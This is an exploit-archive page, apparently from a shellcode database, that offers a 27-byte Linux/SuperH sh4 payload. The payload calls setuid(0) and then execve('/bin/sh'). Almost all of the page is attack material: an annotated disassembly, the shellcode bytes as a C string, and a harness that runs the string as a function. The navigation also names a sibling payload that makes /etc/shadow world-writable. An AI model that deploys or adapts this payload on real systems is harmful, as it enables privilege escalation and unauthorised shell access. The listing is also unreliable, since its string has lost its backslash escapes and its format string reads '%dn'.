Linux/SuperH - sh4 - setuid(0) ; execve("/bin/sh", NULL, NULL)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Linux/SuperH - sh4 - setuid(0) ; execve("/bin/sh", NULL, NULL) - 27 bytes
# Published : 2011-11-24
# Author :
# Previous Title : Linux/SuperH - sh4 - setuid(0) - chmod("/etc/shadow", 0666) - exit(0) - 43 bytes
# Next Title : MIPS Linux XOR Shellcode Encoder (60 Bytes)

/*
  Linux/SuperH - sh4 - setuid(0) ; execve("/bin/sh", NULL, NULL) - 27 bytes
  Tested on debian-sh4 2.6.32-5-sh7751r
  by Jonathan Salwan - twitter: @jonathansalwan

  400054:        17 e3      mov      #23,r3
  400056:        4a 24      xor      r4,r4
  400058:        0b c3      trapa    #11
  40005a:        3a 23      xor      r3,r3
  40005c:        0b e3      mov      #11,r3
  40005e:        02 c7      mova     400068 <__bss_start-0x10008>,r0
  400060:        03 64      mov      r0,r4
  400062:        5a 25      xor      r5,r5
  400064:        6a 26      xor      r6,r6
  400066:        0b c3      trapa    #11
  400068:        2f 62      exts.w   r2,r2
  40006a:        69 6e      swap.w   r6,r14
  40006c:        2f 73      add      #47,r3
  40006e:        68 00      .word 0x0068
*/

#include <stdio.h>
#include <string.h>

char *SC = "x17xe3x4ex24"
           "x0bxc3x3ax23"
           "x0bxe3x02xc7"
           "x03x64x5ax25"
           "x6ax26x0bxc3"
           "x2fx62x69x6e"
           "x2fx73x68"; 

void main(void)
{
  fprintf(stdout, "Length: %dn", strlen(SC));
  (*(void(*)()) SC)();
}